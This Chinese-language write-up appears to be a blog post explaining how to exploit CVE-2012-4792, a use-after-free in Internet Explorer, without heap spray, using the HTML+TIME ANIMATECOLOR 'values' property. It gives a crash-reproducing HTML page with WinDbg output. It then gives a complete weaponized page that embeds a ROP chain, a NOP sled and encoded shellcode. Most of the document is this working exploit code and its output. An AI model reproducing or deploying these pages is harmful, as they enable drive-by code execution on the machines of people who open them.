CVE-2012-4792 Exploit Without Heap Spray

前面的一篇用Heap Spray完成了在win7下绕过DEP及ASLR的利用,这次同样以CVE-2012-4792作为例子。前面读了国外的一篇文章:

http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/

文章提到用一种叫“HTML+TIME”的东西,通过该方法可以实现不需要Heap Spray就能完成exploit,具体说明如下:

引用HTML+TIME的代码如下:
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
        <meta>
                <!-- Binds the "t" prefix to the HTML+TIME (time2) behavior so that <t:...> elements are recognised -->
                <?IMPORT namespace="t" implementation="#default#time2">
        </meta>
.
.
.
    <!-- HTML+TIME element whose "values" property is assigned from script later on -->
    <t:ANIMATECOLOR id="myanim"/>
接下来只需要构造ANIMATECOLOR的values属性,该属性可参考上面的最后一个知识库链接,构造如下:
animvalues = "\u4141\u4141"
while(animvalues.length < 0xDC) {
     animvalues += animvalues
}
for(i = 0; i < 21; i++) {
     animvalues += ";cyan";
}
最终产生的字符串如下形式:
“\u4141\u4141....;cyan;cyan;cyan;cyan;”
每个分号作为分隔符,这样一共22组,接下来将这个字符串通过以下方式赋值给ANIMATECOLOR的values属性:
// Assign the prepared values string to the ANIMATECOLOR element; any exception is ignored.
try {
     a = document.getElementById('myanim');
     a.values = animvalues;
} catch (err) {
     // intentionally ignored
}
由于ANIMATECOLOR的特性,a.values会根据字符串的格式来申请堆空间,申请的空间大小取决于字符串被分号分隔的项数;分配后的堆空间将用每一项(分号分隔的项)的地址来初始化。这里将会申请22*4个字节的堆空间,即0x58大小,每个DWORD保存每一项的地址,因此我们就控制了内存中的一个指针,并能够控制该指针指向的数据,接下来就可以进行exploit了:
<!doctype html>
<!-- Crash-only variant: item 1 of the values string is "A" filler, so this page only
     demonstrates the controlled pointer (eip=41414141 in the debugger output below). -->
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
     <!-- Binds the "t" prefix to the HTML+TIME (time2) behavior -->
     <?IMPORT namespace="t" implementation="#default#time2">
</meta>
     <script>
     // Builds the 22-item "values" string, runs the DOM sequence, then assigns the
     // string to the ANIMATECOLOR element. Called from the body onload handler.
     function helloWorld() {
          var e0 = null;
          var e1 = null;
          var e2 = null;
          // Item 1: "\u4141\u4141" doubled until it is at least 0xDC (220) UTF-16 units
          // long (the loop stops at 256).
          animvalues = "\u4141\u4141"
     while(animvalues.length < 0xDC)
          {
          animvalues += animvalues
       }
     // Items 2..22: 21 x ";cyan".
     for(i = 0; i < 21; i++)
       {
          animvalues += ";cyan";
       }
          // DOM manipulation on the form (#a), the dfn (#b) and a created <q>; any
          // exception is deliberately swallowed. NOTE(review): the order of these
          // operations appears to be part of the trigger - do not reorder.
          try {
               e0 = document.getElementById("a");
               e1 = document.getElementById("b");
               e2 = document.createElement("q");
               e1.applyElement(e2);
               e1.appendChild(document.createElement('button'));
               e1.applyElement(e0);
               e2.outerText = "";
               e2.appendChild(document.createElement('body'));
          } catch(e) { }
          // Explicit garbage collection before the values string is assigned.
          CollectGarbage();
          // Setting .values allocates one pointer per item (22 * 4 = 0x58 bytes, per the
          // text); each DWORD points at the corresponding item's string data.
          try {
               a = document.getElementById('myanim');
               a.values = animvalues;
          }
          catch(e) {}


     }

     </script>
</head>
<!-- helloWorld() returns nothing, so the eval() wrapper is a no-op around the call -->
<body onload="eval(helloWorld())">
     <!-- HTML+TIME element whose "values" property is set by helloWorld() -->
     <t:ANIMATECOLOR id="myanim"/>
     <form id="a">
     </form>
     <dfn id="b">
     </dfn>
</body>
</html>
windbg挂载后的崩溃信息如下:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
eip=41414141 esp=020df830 ebp=020df8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???
0:008> dd edi
00216468  00199c60 02e1ebc0 0023f5c0 0023f5d8
00216478  0023f578 0016bda0 0016bbd8 00187da0
00216488  0333bce0 0333bcf8 0333bd10 0333bd28
00216498  0333bd40 0333bd58 0333bd70 0333bd88
002164a8  0333bda0 0333bdb8 0333bdd0 0333bde8
002164b8  0333be00 0333be18 eaa84100 ff080000
002164c8  000000fe 00000000 00000000 00000000
002164d8  00000000 00000000 00000000 00000000
0:008> dc poi(edi)
00199c60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c80  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c90  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199ca0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cb0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cc0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cd0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
0:008> dc poi(edi+4)
02e1ebc0  00790063 006e0061 02e80000 00000000  c.y.a.n.........
02e1ebd0  eaf06f92 ff080167 02e235dc 001f9038  .o..g....5..8...
02e1ebe0  02e8e12c 00000000 eaf06f95 ff0c0100  ,........o......
02e1ebf0  6359d910 00000001 001f9028 00000000  ..Yc....(.......
02e1ec00  eaf06f68 ff0c010a 00000000 00000000  ho..............
02e1ec10  00000001 00000000 eaf06f6b ff080100  ........ko......
02e1ec20  0021cfd0 001f9038 02e1eb78 00000000  ..!.8...x.......
02e1ec30  00000000 00000000 00000000 00000000  ................
0:008> dc poi(edi+8)
0023f5c0  00790063 006e0061 00200000 00000000  c.y.a.n... .....
0023f5d0  eaabd9a2 ff0e0100 00790063 006e0061  ........c.y.a.n.
0023f5e0  00200000 00000000 eaabd9a5 ff080100  .. .............
0023f5f0  00148098 00000001 1690030b 01700d8c  ..............p.
0023f600  eaabd9d8 ff080100 0063006e 006c0061  ........n.c.a.l.
0023f610  00700072 00000063 eaabd9db ff0c0100  r.p.c...........
0023f620  00000002 50000001 50000007 02db1318  .......P...P....
0023f630  eaabd9de ff0a0100 0074006e 00760073  ........n.t.s.v.
可以看到edi指向一块大小为0x58的堆空间,其中的每个DWORD都指向前面分配的字符串的各项。这样我们就可以控制一个指针以及该指针所指向的数据了。下面使用前一篇文章中的ROP链:
<!doctype html>
<!-- Payload variant of the page above: identical DOM sequence, but item 1 of the
     values string is now the ROP chain and payload instead of "A" filler. -->
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
     <!-- Binds the "t" prefix to the HTML+TIME (time2) behavior -->
     <?IMPORT namespace="t" implementation="#default#time2">
</meta>
     <script>
     // Navigates to an ms-help: URL before the trigger runs. The text does not explain
     // its role; NOTE(review): presumably a precondition for the hard-coded addresses
     // below - confirm against the linked article.
     location.href = 'ms-help://'
     // Builds the 22-item "values" string, runs the DOM sequence, then assigns the
     // string to the ANIMATECOLOR element. Called from the body onload handler.
     function helloWorld() {
          var e0 = null;
          var e1 = null;
          var e2 = null;
          // Item 1: a ROP chain (addresses reused from the previous article, so the
          // string only fits the exact module builds those addresses came from), a run
          // of \u9090 (x86 NOP) bytes, then further payload bytes the text does not describe.
          animvalues = 
          "\u34b4\u51bf\u10b8\u51bd\u2d97\u51bd\ucba0\u51bd"+
          "\u79e2\u51c3\u9683\u51c5\u6fbd\u51c5\ufffe\ua17f"+
          "\u1e01\u51c1\u92d8\u51c3\ue67d\u51bf\u6fbd\u51c5"+
          "\ufc3d\ua17f\u1e01\u51c1\u592b\u51bf\ucf3e\u51be"+
          "\ud150\u51c5\uf563\u51be\u7402\u51c0\u6fbd\u51c5"+
          "\u9090\u9090\ua8dc\u51bd"+               //ROP End
          "\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u4a41\u51be"+
          "\u9090\u9090"+
          "\uc481\uf254\uffff\u2ebf\ue4ed\udbc0\ud9c8\u2474" +
          "\u58f4\uc933\u33b1\u7831\u0312\u1278\uee83\u06e9" +
          "\u1235\u4f19\ueab6\u30da\u0f3e\u62eb\u4424\ub35e" +
          "\u082e\u3853\ub862\u4ce0\ucfab\ufa41\ufe8d\uca52" +
          "\uac11\u4c91\uaeee\uaec5\u61cf\uae18\u9f08\ue2d3" +
          "\ud4c1\u1346\ua865\u125a\ua7a9\u6ce3\u77cc\uc697" +
          "\ua7cf\u5c08\u5f87\u3a22\u5e38\u58e7\u2904\uab8c" +
          "\ua8fe\ue244\u9bff\ua9a8\u14c1\ub325\u9206\uc6d6" +
          "\ue17c\ud16b\u9846\u54b7\u3a5b\uce33\ubbbf\u8990" +
          "\ub734\udd5d\udb13\u3260\ue728\ub5e9\u6eff\u91a9" +
          "\u2bdb\ubb69\u917a\uc4dc\u7d9d\u6080\u6fd5\u13d5" +
          "\ue5b4\u9128\u40c2\ua92a\ue2cc\u9843\u6d47\u2513" +
          "\uca82\u6feb\u7a8f\u3664\u3f45\uc9e9\u03b3\u4a14" +
          "\ufb36\u52e3\ufe33\ud4a8\u72af\ub0a0\u21cf\u90c1" +
          "\ua4b3\u7851\u431a\u1bd2\u4162";

     // Items 2..22: 21 x ";cyan", as in the crash-only page.
     for(i = 0; i < 21; i++)
       {
          animvalues += ";cyan";
       }
          // DOM manipulation on the form (#a), the dfn (#b) and a created <q>; any
          // exception is deliberately swallowed. NOTE(review): the order of these
          // operations appears to be part of the trigger - do not reorder.
          try {
               e0 = document.getElementById("a");
               e1 = document.getElementById("b");
               e2 = document.createElement("q");
               e1.applyElement(e2);
               e1.appendChild(document.createElement('button'));
               e1.applyElement(e0);
               e2.outerText = "";
               e2.appendChild(document.createElement('body'));
          } catch(e) { }
          // Explicit garbage collection before the values string is assigned.
          CollectGarbage();
          // Setting .values allocates one pointer per item (22 * 4 = 0x58 bytes, per the
          // text); the first DWORD points at item 1, i.e. at the payload string.
          try {
               a = document.getElementById('myanim');
               a.values = animvalues;
          }
          catch(e) {}


     }

     </script>
</head>
<!-- helloWorld() returns nothing, so the eval() wrapper is a no-op around the call -->
<body onload="eval(helloWorld())">
     <!-- HTML+TIME element whose "values" property is set by helloWorld() -->
     <t:ANIMATECOLOR id="myanim"/>
     <form id="a">
     </form>
     <dfn id="b">
     </dfn>
</body>
</html>

这样就可以不通过Heap Spray完成漏洞的利用。
